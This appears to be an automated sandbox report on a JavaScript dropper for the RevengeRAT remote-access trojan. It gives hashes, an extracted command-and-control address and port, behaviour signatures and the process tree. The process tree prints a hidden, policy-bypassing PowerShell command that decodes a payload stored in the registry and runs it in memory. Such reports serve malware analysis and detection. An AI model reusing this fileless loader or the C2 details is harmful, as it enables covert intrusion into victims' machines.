Analysis
-
max time kernel
146s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-01-2025 02:09
Static task
static1
Behavioral task
behavioral1
Sample
07c41d727f11d4594a6591b644eff38c253e44d4cb908cecfdc66b36dae238e2.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
07c41d727f11d4594a6591b644eff38c253e44d4cb908cecfdc66b36dae238e2.js
Resource
win10v2004-20241007-en
General
-
Target
07c41d727f11d4594a6591b644eff38c253e44d4cb908cecfdc66b36dae238e2.js
-
Size
256KB
-
MD5
d9502fb08720229c43e883d68c39258c
-
SHA1
fd889a14456fd1f3a862e6b1d647049c0b63674c
-
SHA256
07c41d727f11d4594a6591b644eff38c253e44d4cb908cecfdc66b36dae238e2
-
SHA512
bbdc0c079953acc89e25a654445e36a3b4414b527d67137be752b5101562b12c01643a0468edd02ef30baebe9e3098419073f1ff0c7db512b1b57299e72ab7a2
-
SSDEEP
6144:o0hOy97siZVxLcCIaqIgj2U1Ska535/KBsSTJ/cK144AGxayi7jcvB3zJFCIc:o0hO27siLxLWrpVM
Malware Config
Extracted
revengerat
NyanCatRevenge
13.49.66.229:333
8a25aa6e78e44708a
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Revengerat family
-
Blocklisted process makes network request 26 IoCs
flow pid Process 14 656 powershell.exe 18 656 powershell.exe 23 656 powershell.exe 24 656 powershell.exe 30 656 powershell.exe 39 656 powershell.exe 40 656 powershell.exe 41 656 powershell.exe 42 656 powershell.exe 43 656 powershell.exe 47 656 powershell.exe 48 656 powershell.exe 49 656 powershell.exe 50 656 powershell.exe 51 656 powershell.exe 56 656 powershell.exe 58 656 powershell.exe 59 656 powershell.exe 60 656 powershell.exe 61 656 powershell.exe 62 656 powershell.exe 63 656 powershell.exe 64 656 powershell.exe 65 656 powershell.exe 66 656 powershell.exe 67 656 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 656 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 656 powershell.exe 656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 656 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 2068 wrote to memory of 656 2068 wscript.exe 83 PID 2068 wrote to memory of 656 2068 wscript.exe 83
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\07c41d727f11d4594a6591b644eff38c253e44d4cb908cecfdc66b36dae238e2.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\' -name 'KeyName').KeyName;$_b=$_b.replace('~','40');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:656
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82